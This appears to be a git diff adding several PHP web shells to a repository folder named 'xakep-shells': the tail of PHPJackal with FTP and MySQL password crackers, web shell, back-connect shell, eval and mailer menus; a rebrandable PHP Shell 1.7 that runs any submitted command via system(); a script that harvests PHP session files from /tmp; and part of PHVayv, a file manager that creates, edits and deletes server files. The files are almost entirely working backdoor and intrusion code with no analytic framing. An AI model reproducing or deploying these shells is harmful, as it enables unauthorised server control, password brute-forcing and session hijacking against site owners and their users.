+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}
+else{
+echo "<center>${t}MySQL cracker:$crack";
+}
+}
+}
+function ftpcrackeR(){
+global $errorbox,$t,$et,$crack;
+if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et";
+else{
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;}
+if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass<br>";if(!$type)break;}
+ftp_close($ftp);
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}
+else echo "<center>${t}FTP cracker:$crack";
+}}
+function openiT($name){
+$ext=strtolower(substr($name,strrpos($name,'.')+1));
+$src=array('php','php3','php4','phps','phtml','phtm','inc');
+if(in_array($ext,$src))highlight_file($name);
+else echo "<font color=blue><pre>".htmlspecialchars(file_get_contents($name))."</pre></font>";
+}
+function logouT(){
+setcookie('passw','',time()-10000);
+header('Location: '.hlinK());
+}
+?>
+<html>
+<head>
+<style>body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table { font-size: 15px; } .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}</style>
+<meta http-equiv="Content-Language" content="en-us">
+<title>PHPJackal</title>
+</head><body text="#E2E2E2" bgcolor="#C0C0C0" link="#DCDCDC" vlink="#DCDCDC" alink="#DCDCDC">
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#282828" bgcolor="#333333" width="100%">
+<tr><td><a href=javascript:history.back(1)>[Back]</a> - <a href="<?php $cwd= getcwd(); echo hlinK("seC=sysinfo&workingdiR=$cwd");?>">[Info]</a> - <a href="<?php echo hlinK("seC=fm&workingdiR=$cwd");?>">[File manager]</a> - <a href="<?php echo hlinK("seC=edit&workingdiR=$cwd");?>">[Editor]</a> - <a href="<?php echo hlinK("seC=webshell&workingdiR=$cwd");?>">[Web shell]</a> - <a href="<?php echo hlinK("seC=br&workingdiR=$cwd");?>">[B/R shell]</a> - <a href="<?php echo hlinK("seC=asm&workingdiR=$cwd");?>">[Safe-mode]</a> - <a href="<?php echo hlinK("seC=mysql&workingdiR=$cwd"); ?>">[SQL]</a> - <a href="<?php echo hlinK("seC=mailer&workingdiR=$cwd"); ?>">[Mailer]</a> - <a href="<?php echo hlinK("seC=eval&workingdiR=$cwd");?>">[Evaler]</a> - <a href="<?php echo hlinK("seC=sc&workingdiR=$cwd"); ?>">[Scanners]</a> - <a href="<?php echo hlinK("seC=cr&workingdiR=$cwd");?>">[Crackers]</a> - <a href="<?php echo hlinK("seC=px&workingdiR=$cwd");?>">[Pr0xy]</a> - <a href="<?php echo hlinK("seC=whois&workingdiR=$cwd");?>">[Whois]</a> - <a href="<?php echo hlinK("seC=calc&workingdiR=$cwd");?>">[Convert]</a> - <a href="<?php echo hlinK("seC=about&workingdiR=$cwd");?>">[About]</a> <?php if(isset($_COOKIE['passw'])) echo "- [<a href=\"".hlinK("seC=logout")."\">Logout</a>]";?></td></tr></table>
+<hr size=1 noshade>
+<?php
+if (!empty($_REQUEST['seC'])){
+switch($_REQUEST['seC']){
+case 'fm':filemanager();break;
+case 'sc':scanneR();break;
+case 'phpinfo': phpinfo();break;
+case 'edit': if (!empty($_REQUEST['open']))editoR($_REQUEST['filE']);
+if (!empty($_REQUEST['Save'])){
+$filehandle= fopen($_REQUEST['file'],"w");
+fwrite($filehandle,$_REQUEST['edited']);
+fclose($filehandle);}
+if (!empty($_REQUEST['filE'])) editoR($_REQUEST['filE']);else editoR('');
+break;
+case 'openit':openiT($_REQUEST['namE']);break;
+case 'cr': crackeR();break;
+case 'dic':dicmakeR();break;
+case 'whois':whoiS();break;
+case 'hex':hexvieW();break;
+case 'img':showimagE($_REQUEST['filE']);break;
+case 'inc':include ($_REQUEST['filE']);break;
+case 'hc':hashcrackeR();break;
+case 'fcr':formcrackeR();break;
+case 'snmp':snmpcrackeR();break;
+case 'sql':sqlcrackeR();break;
+case 'auth':authcrackeR();break;
+case 'pop3':pop3crackeR();break;
+case 'imap':imapcrackeR();break;
+case 'smtp':smtpcrackeR();break;
+case 'ftp':ftpcrackeR();break;
+case 'eval':phpevaL();break;
+case 'px':pr0xy();break;
+case 'webshell':webshelL();break;
+case 'mailer':maileR();break;
+case 'br':brshelL();break;
+case 'asm':safemodE();break;
+case 'mysql':mysqlclienT();break;
+case 'calc':calC();break;
+case 'sysinfo':sysinfO();break;
+case 'checksum':checksuM($_REQUEST['filE']);break;
+case 'logout':logouT();break;
+default: echo $intro;
+}}else echo $intro;
+echo $footer;?></body></html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/phpshell17.php.txt b/xakep-shells/PHP/phpshell17.php.txt
new file mode 100644
index 0000000..d488436
--- /dev/null
+++ b/xakep-shells/PHP/phpshell17.php.txt
@@ -0,0 +1,177 @@
+<?php
+
+define(�PHPSHELL_VERSION�, �1.7�);
+
+/*
+
+**************************************************************
+* PHP Shell *
+**************************************************************
+$Id: phpshell.php,v 1.18 2002/09/18 15:49:54 gimpster Exp $
+
+PHP Shell is aninteractive PHP-page that will execute any command
+entered. See the files README and INSTALL or http://www.gimpster.com
+for further information.
+
+Copyright (C) 2000-2002 Martin Geisler < gimpster@gimpster.com>
+
+This program is free software; you can redistribute it and/or
+modify it under the terms of the GNU General Public License
+as published by the Free Software Foundation; either version 2
+of the License, or (at your option) any later version.
+
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU General Public License for more details.
+
+You can get a copy of the GNU General Public License from this
+address: http://www.gnu.org/copyleft/gpl.html#SEC1
+You can also write to the Free Software Foundation, Inc., 59 Temple
+Place - Suite 330, Boston, MA 02111-1307, USA.
+
+*/
+?>
+
+<html>
+<head>
+<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></title>
+</head>
+<body>
+<h1>[YOUR HEADER[ <?php echo PHPSHELL_VERSION ?> [ADITTIONAL TEXT] -
+[ADDITIONAL TEXT]</h1><br><hr><marquee><b>[ADDITIONAL MESSEGE OR TEXT]</b></marquee><hr><br>
+
+<?php
+
+if (ini_get(�register_globals�) != �1�) {
+/* We�ll register the variables as globals: */
+if (!empty($HTTP_POST_VARS))
+extract($HTTP_POST_VARS);
+
+if (!empty($HTTP_GET_VARS))
+extract($HTTP_GET_VARS);
+
+if (!empty($HTTP_SERVER_VARS))
+extract($HTTP_SERVER_VARS);
+}
+
+/* First we check if there has been asked for a working directory. */
+if (!empty($work_dir)) {
+/* A workdir has been asked for */
+if (!empty($command)) {
+if (ereg(�^[[:blank:]]*cd[[:blank:]]+([^;]+)$�, $command, $regs)) {
+/* We try and match a cd command. */
+if ($regs[1][0] == �/�) {
+$new_dir = $regs[1]; // �cd /something/...�
+} else {
+$new_dir = $work_dir . �/� . $regs[1]; // �cd somedir/...�
+}
+if (file_exists($new_dir) && is_dir($new_dir)) {
+$work_dir = $new_dir;
+}
+unset($command);
+}
+}
+}
+
+if (file_exists($work_dir) && is_dir($work_dir)) {
+/* We change directory to that dir: */
+chdir($work_dir);
+}
+
+/* We now update $work_dir to avoid things like �/foo/../bar�: */
+$work_dir = exec(�pwd�);
+
+?>
+
+<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
+<p>Current working directory: <b>
+<?php
+
+$work_dir_splitted = explode(�/�, substr($work_dir, 1));
+
+echo �<a xhref="� . $PHP_SELF . �?work_dir=/">Root</a>/�;
+
+if (!empty($work_dir_splitted[0])) {
+$path = ��;
+for ($i = 0; $i < count($work_dir_splitted); $i++) {
+$path .= �/� . $work_dir_splitted[$i];
+printf(�<a xhref="%s?work_dir=%s">%s</a>/�,
+$PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
+}
+}
+
+?></b></p>
+<p>Choose new working directory:
+<select name="work_dir" onChange="this.form.submit()">
+<?php
+/* Now we make a list of the directories. */
+$dir_handle = opendir($work_dir);
+/* Run through all the files and directories to find the dirs. */
+while ($dir = readdir($dir_handle)) {
+if (is_dir($dir)) {
+if ($dir == �.�) {
+echo "<option value="$work_dir" selected>Current Directory</option> ";
+} elseif ($dir == �..�) {
+/* We have found the parent dir. We must be carefull if the parent
+directory is the root directory (/). */
+if (strlen($work_dir) == 1) {
+/* work_dir is only 1 charecter - it can only be / There�s no
+parent directory then. */
+} elseif (strrpos($work_dir, �/�) == 0) {
+/* The last / in work_dir were the first charecter.
+This means that we have a top-level directory
+eg. /bin or /home etc... */
+echo "<option value="/">Parent Directory</option> ";
+} else {
+/* We do a little bit of string-manipulation to find the parent
+directory... Trust me - it works :-) */
+echo "<option value="". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."">Parent Directory</option> ";
+}
+} else {
+if ($work_dir == �/�) {
+echo "<option value="$work_dir$dir">$dir</option> ";
+} else {
+echo "<option value="$work_dir/$dir">$dir</option> ";
+}
+}
+}
+}
+closedir($dir_handle);
+
+?>
+
+</select></p>
+
+<p>Command: <input type="text" name="command" size="60">
+<input name="submit_btn" type="submit" value="Execute Command"></p>
+
+<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
+<textarea cols="80" rows="20" readonly>
+
+<?php
+if (!empty($command)) {
+if ($stderr) {
+$tmpfile = tempnam(�/tmp�, �phpshell�);
+$command .= " 1> $tmpfile 2>&1; " .
+"cat $tmpfile; rm $tmpfile";
+} else if ($command == �ls�) {
+/* ls looks much better with � -F�, IMHO. */
+$command .= � -F�;
+}
+system($command);
+}
+?>
+
+</textarea>
+</form>
+
+<script language="JavaScript" type="text/javascript">
+document.forms[0].command.focus();
+</script>
+
+<hr>
+<i>Copyright � 2004�2005, <a
+href="mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>
+</body>
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/phvayv.php.php.txt b/xakep-shells/PHP/phvayv.php.php.txt
new file mode 100644
index 0000000..96ff07a
--- /dev/null
+++ b/xakep-shells/PHP/phvayv.php.php.txt
@@ -0,0 +1,124 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B�ce�i&nbsp;&nbsp; </title>
+</head>
+
+<body text="#008000" bgcolor="#808080" topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" marginwidth="0" marginheight="0">
+
+<table border="0" width="100%" id="table1" cellspacing="0" cellpadding="0" height="108">
+	<tr>
+    <td width="70" bgcolor="#000000" height="83">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="83" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup�<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geli�tirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    Sincap 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="83" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    <br>
+    </font><br>
+    <font color="#858585" face="Verdana" style="font-size: 8pt">www.aventgrup.net&nbsp;<br>
+    </font></span><a href="mailto:shopen@aventgrup.net">
+	<font face="Verdana" style="font-size: 8pt; text-decoration: none" color="#C0C0C0">
+	info@aventgrup.net</font></a><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  	</tr>
+	<tr>
+    <td width="1002" bgcolor="#484848" height="25" colspan="3">
+    <font color="#E5E5E5" style="font-size: 8pt; font-weight: 700" face="Arial">&nbsp; 
+	Linux Sessin ( Oturum ) B�ce�i</font></td>
+    </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#800000" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="8%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;S. 
+    No</font></td>
+    <td width="25%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Oturum 
+    Ad�</font></td>
+    <td width="42%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Oturum 
+    De�eri</font></td>
+    <td width="25%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Referans</font></td>
+  </tr>
+<tr>
+
+
+<?
+if ($sedat=@opendir("/tmp")){
+while (($ekinci=readdir ($sedat))){
+if (is_file("/tmp/$ekinci")){
+if($ekinci>"sess_"){
+$asortik=$ekinci;
+$baglan=fopen("/tmp/$ekinci",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+$toplam="$toplam$okunan";
+} fclose($baglan); 
+};
+?>
+
+
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+$metin=$toplam;
+$i=explode(";",$metin);
+?>
+
+
+
+
+<?
+foreach($i as $yeni){
+$tampon=explode("|",$yeni);
+$deger1= "$tampon[0]";
+$ich=explode(":",$tampon[1]);
+$tampon3=count($ich);
+$tampon4=$tampon3-1;
+$deger2= "$ich[$tampon4]";
+$is++;
+$temizleme=array(
+'"'=>'',
+'v'=>'',
+'c'=>''
+);
+$degerT= strtr($deger2,$temizleme);
+?>
+    <td width="8%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $is;?></font></td>
+    <td width="25%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $deger1;?></font></td>
+    <td width="42%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $degerT;?></font></td>
+    <td width="25%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;-</td>
+
+</tr>
+<?};?>
+
+</table>
+
+</body>
+
+</html>
+
+
diff --git a/xakep-shells/PHP/phvayvv.php.php.txt b/xakep-shells/PHP/phvayvv.php.php.txt
new file mode 100644
index 0000000..c01e2c7
--- /dev/null
+++ b/xakep-shells/PHP/phvayvv.php.php.txt
@@ -0,0 +1,597 @@
+<? if($sistembilgisi > "") {phpinfo();} else { ?>
+
+
+<?$fistik=PHVayv;?>
+
+
+<?if ($sildos>"") {unlink("$dizin/$sildos");} ?>
+
+<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?>
+
+<?if ($silklas > ""){rmdir($silklas);}?>
+
+<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?>
+
+
+
+<?if ($yenidosya == "1") {
+$baglan=fopen("$dizin/$duzenx2",'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($duzkaydet > "") {
+
+$baglan=fopen($duzkaydet,'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($yenklas>"") {;?>
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup�<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geli�tirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;�al���lan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="144">
+    <form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx2" value="Klas�r Ad�"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullan�c�'"
+                onfocus="if (this.value == 'Kullan�c�') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+<?if ($yendos>"") {;
+?>
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup�<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geli�tirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;�al���lan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="455">
+    <form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="50" maxlength="32"
+                name="duzenx2" value="Dosya Ad�"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullan�c�'"
+                onfocus="if (this.value == 'Kullan�c�') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><br>
+&nbsp;</p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+
+<?if ($duzenle>"") {; 
+?>
+
+
+
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup�<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geli�tirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;�al���lan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="1">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19">
+          <tr>
+            <td width="1" height="19"></td>
+            <td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin/$duzenle"?></font></td>
+          </tr>
+          <tr>
+            <td width="1" height="1"></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F">
+    <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <br>
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+echo $okunan;
+} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    &nbsp;</td>
+  </tr>
+  </table>
+
+
+
+
+
+
+
+
+
+
+
+<?
+} else {
+?>
+
+
+
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>PHVayv 1.0</title>
+</head>
+
+<body topmargin="0" leftmargin="0">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
